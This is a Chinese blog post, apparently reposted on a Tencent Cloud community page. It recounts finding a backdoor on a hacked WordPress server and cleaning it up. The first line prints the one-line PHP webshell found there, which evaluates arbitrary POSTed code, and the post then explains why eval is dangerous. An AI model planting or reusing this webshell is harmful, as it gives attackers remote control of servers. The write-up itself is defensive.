<?php @eval($_POST[8])?>

一周前,我账号下的几台服务器,有一台是朋友的,挂着他公司的网站,不知道,从月初开始,一直收到挂马的短信通知,更离谱的是成了肉鸡,流量异常,在远程DDoS别的机器,这万一让服务商吧服务器给处罚了......就不好了。开始我也没在乎,也许是被扫到了。但是成了肉鸡之后,我决定看一下。

首先,他的网站用的是wordpress OS(最近漏洞消息不断,我昨天收到的邮件里,有一封是关于这个)

这里插一句,全球有27%左右的网站用的这个系统。

至于那台服务器是如何被入侵的,我看了一看服务器了的文件,有连个个.php文件:

里面的代码就是我写的标题。

这是传说中的一句话木马。eval可以用来执行任何其他php代码,危险系数比较大。

删掉这些文件,密码改掉,可能的漏洞已修补,完事(这几天没有收到信息,不过过几天怎么样,哈哈就不敢说了)。

有的网站的站长,有些是不懂技术的,对上上边的这个eval函数,不用的话最好禁止一下。

下面是我找的禁止函数的方法。

有不少的站长,在维护自己的服务器的时候,托管方要找点靠谱点的,我说的这台服务器就是交给了第三方,我不敢说他们和黑产有多少联系,不过还是小心点好。

原文发布于微信公众号 - 数据库SQL(SQLdba)

原文发表时间:2016-11-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Youngxj

杨小杰工具箱1.5

1334
来自专栏CSDN技术头条

Hugo:一个快速、现代的静态网页引擎

Hugo是一个制作静态页面的工具,非常灵活,可以以多种形式工作,是制作博客、文档、个人履历等非常合适的工具。Hugo激发了创造力,让建造网页变得充满乐趣。 “一...

2095
来自专栏九彩拼盘的叨叨叨

玩转 Github 徽章

我们如果希望和某个 Github 项目开发者沟通,比如给这个项目提个 bug 之类。传统的方式是在该项目创建一个 issue ,等开发者看到后(可能是很久之后~...

852
来自专栏owent

Blog切换到Hugo

其实很早就想把Blog迁移到静态化的博客系统了。不过一直没花时间来搞,当然主要原因还是懒。

581
来自专栏FreeBuf

SQLCipher之攻与防

0×00 SQLCipher 在移动端,不管是iOS还是Android,开发人员用的最多的本地数据库非SQlite莫属了。SQLite是一个轻量的、跨平台的、开...

3336
来自专栏FreeBuf

如何用一个废旧的笔记本打造一个家庭网络服务器?

本来好好的笔记本的,可偏偏屏幕说烂就烂,那就干脆不要了,改造改造吧! 他本来长这样的,如图: ? 什么,你看见了水印….老哥,别在意这些细节。 简单说一下配置:...

2088
来自专栏精讲JAVA

我就想问问有多少人不会idea热部署的!!!赶紧学

今天,公众号上的一个粉丝说想让我调一下bug,自己解决好多天了,一直没有找到问题所在,本着救人一命胜造七级浮屠的觉悟,果断teamview了。谁让...

281
来自专栏小白安全

内网渗透的一些工具和平台

渗透测试平台类: Metasploit,这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备。SE...

5125
来自专栏信安之路

信安之路挑战赛红蓝对抗题目全解析

首先,题目其实设置不是太难,主要是坑有点多,而且需要一定的时间才能完成。因为要本着贴近实战的原则出题,所以在做题的时候,很多人还是带着做传统 CTF 题目的思路...

863
来自专栏Netkiller

植入式攻击入侵检测解决方案

植入式攻击入侵检测解决方案 ---- 目录 1. 什么是植入式攻击? 2. 为什么骇客会在你的系统里面植入木马? 3. 什么时候被挂马? 4. 在那里挂马的? ...

2647

扫码关注云+社区